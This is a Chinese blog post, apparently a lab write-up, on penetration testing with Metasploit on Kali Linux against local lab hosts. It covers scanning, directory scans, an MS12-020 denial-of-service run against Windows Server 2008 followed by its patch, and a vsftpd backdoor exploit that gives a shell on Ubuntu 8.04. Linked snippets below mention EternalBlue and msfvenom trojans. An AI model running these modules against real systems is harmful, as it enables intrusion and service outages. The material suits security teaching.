网络安全: Kali Linux 使用 MSF 渗透测试

最新推荐文章于 2024-05-31 16:35:50 发布
最新推荐文章于 2024-05-31 16:35:50 发布
阅读量1.9k 收藏 19
点赞数 26
分类专栏: 网络安全 文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cronaldo91/article/details/136470313
版权
本文详细描述了在KaliLinux2024.1和2022.4环境下,使用MetasploitFramework进行系统版本检查、IP地址获取、登录控制台、数据库初始化、工作区管理、网络扫描、漏洞利用、DOS攻击、Windowsserver补丁安装以及基本的MSF模块和命令操作。同时,文章还涉及到了MSF在实际环境中的问题与解决方案。
摘要由CSDN通过智能技术生成

目录

一、实验

1.环境

2.登录MSF(Metasploit Framework)控制台

3.MSF初始化

4.MSF 管理工作区

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

7.Kali Linux (2024.1) 对Windows server 进行DOS 

8.Windows server 安装补丁

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

二、问题

1.MSF常用模块与基础命令

一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2024.1

192.168.204.146(动态)

192.168.204.100(静态)

Windows server2008 R2192.168.204.150Kali(2024.1)的目标主机
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2024.1)系统版本

cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

 (5)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2.登录MSF(Metasploit Framework)控制台

(1)Kali Linux (2024.1)系统版本

msfconsole

启动

进入并退出

(2)Kali Linux (2022.4)系统版本

msfconsole

启动

进入并退出

3.MSF初始化

(1)Kali Linux (2024.1)系统版本

初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

(2)Kali Linux (2022.4)系统版本

 初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

4.MSF 管理工作区

(1)Kali Linux (2024.1)系统版本

 查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  cicd

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  cicd

扫描Windows server数据

db_nmap 192.168.204.150

(2)Kali Linux (2022.4)系统版本

查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  devops

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  devops

 扫描Ubuntu数据

db_nmap 192.168.204.143

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

(1) 搜索 dir_scan 脚本

search dir_scan

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

(4)运⾏脚本

run

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

 (1) 搜索 dir_scan 脚本

search dir_scan

 (2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run

 7.Kali Linux (2024.1) 对Windows server 进行DOS 

(1) 搜索 dir_scan 脚本

search ms12-020

(2) 使⽤编号为 1 的脚本

use 1

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run

查看Windows server状态

8.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

ms12-020

(3)安装补丁

重启

 (4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run

(5)Windows server

保持正常

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

(1) 查看目标主机

先返回

back

目标主机为192.168.204.143

db_nmap -sP 192.168.204.0/24

扫描开放端口

db_nmap -sV 192.168.204.143

21端口已打开

 (2) 搜索 vsftpd 脚本

search vsftpd

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

//查看当前目录
pwd

//查看当前用户
whoami

//查看端口
netstat -antlp | grep 80

//查看进程
ps -elf | grep sshd

退出

exit

二、问题

1.MSF常用模块与基础命令

(1)模块

1)Auxiliary 辅助
⼀般负责执⾏扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击,不直接在测试机和⽬标机之间建立访问。

2)Exploit 漏洞利⽤
利⽤发现的安全漏洞或配置弱点对远程⽬标进⾏攻击,以植入和运⾏攻击载荷。

3)Payloads 载荷
⽬标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透⽬标后,⽤于在⽬标系统上运⾏任意命令或者执⾏特定代码。

4)Post 后渗透
在取得⽬标的远程控制权以后,可以进⼀步实施的攻击动作,如获取敏感信息、实施跳板攻击等。

(2)命令

?            //获取帮助
? show       //查看show指令的帮助
search       //搜索模块
use          //使⽤模块
set          //设置模块选项
run          //运⾏当前模块
options      //列出当前模块的选项
show         //查看模块或相关信息
back         //返回上⼀步
exit/quit    //退出

cronaldo91
关注
  • 26
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
02-23 3145
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
【Web安全】kali渗透工具MSF以及msfconsole命令详解
最新发布
2301_77472496的博客
05-31 1036
记录一次体验kali渗透工具MSF以及msfconsole命令详解
渗透工具——kalimsf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 7047
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
kali初讲——Metasploit工具MSF初学
萌蠢骇客
06-13 4735
kali初讲——Metasploit工具MSF初讲
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4471
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
渗透测试网络安全领域中一种重要的实践方法,用于评估和增强系统的安全性。在这个过程中,渗透测试者模拟黑客的行为,尝试发现并利用系统的漏洞。本课程重点讲解了如何利用Metasploit(MSF)框架进行渗透测试,...
E024-渗透测试常用工具-使用Armitage的MSF进行自动化集成渗透测试.pdf
12-02
渗透测试是一种合法的安全测试方法,用于评估计算机网络和系统的安全性。在这个过程中,渗透测试者模拟黑客行为,尝试找出并利用系统中的漏洞。...这对于学习和实践网络安全渗透测试技巧是非常有价值的。
2023年内蒙古自治区中职网络安全赛题-B模块
06-01
3. **渗透测试**:使用Kali Linux进行系统服务和版本扫描,初始化MSF数据库,导入扫描结果,搜索并利用特定漏洞。这要求参赛者熟悉渗透测试工具的使用,理解漏洞利用机制,以及如何进行有效的数据管理。 4. **隐写...
渗透工具——kalimsf(后门生成模块msfvenom)
2301_78006725的博客
09-02 727
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
kali渗透--msf简单使用
qq_46635165的博客
04-17 6319
使用MSF(Metasploit)利用MS12_020 RDP远程代码执行漏洞 实验环境准备 1)一台 winXP 作为受害者(最好拍摄好一个快照)IP:10.1.1.2 2)kali 作为攻击者 IP:10.1.1.1 3)将攻击者和受害者桥接到同一网段,使他们能够相互ping通 漏洞利用条件 1)winxp开启3389端口(RDP) 2)未安装 ms012-020补丁 3)关闭防火墙 4)同一局域网下 漏洞复现 1,在kali使用nmap对XP进行端口探测,nmap -sS -Pn -A 10.1
Kali MSF命令模块最详细模块与利用解释整合
Sunspot
04-19 1696
稍后,如果另一个请求到达该 ISAPI 模块,则将使用先前获得的指针,从而导致访问冲突或潜在的任意代码执行。该模块发送格式错误的 TKEY 查询,该查询利用在受影响的 BIND9“命名”DNS 服务器上处理 TKEY 查询时的错误。由于BigIP会在第一个未经身份验证的请求后分配一个新会话,并且仅当访问策略超时时才删除该会话,因此攻击者可以通过重复发送初始HTTP请求并使会话处于挂起状态来耗尽所有可用的会话。POST 请求处理中的边界错误而存在的,其中应用程序输入设置为过长的文件名。
kaliMSF框架
qq_41821067的博客
02-18 2048
理论准备 认识Metasploit框架 Metasploit模块简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具 ...
网络安全kali web安全 Kalimsf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
网络安全:kaliMSF工具基本使用方法
Mr_qing的博客
10-08 5109
1、进入MSF工具:nsfconsole 2、查询漏洞利用工具:search 漏洞编号 3、打开工具:use 工具id 4、查看工具配置参数:show options 5、查看工具的详细信息:info 6、配置参数: set 参数头 目标主机 set 参数头 目标端口 (参数配置根据实际所缺参数为准) 7、运行工具:run或者exploit @返回命令:back @新版kali已经自动配置Payload;不需要再次自己配置(当然也可以自己配置:set payload windows/***/…
kalimsf渗透测试
weixin_45380284的博客
03-05 3621
kalimsf渗透测试 1.metasploit介绍、安装、更新、目录结构 1.metasploit介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称MSF。是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。Metasploit就是一个漏洞框架。 2.MSF安装要求 硬盘空间: 至少10G,个人建议50G;由于分区时用FAT32类型不支持大文件运行,所以分区
kali渗透进入msf
10-31
Kali是一个被广泛应用于渗透测试网络安全Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值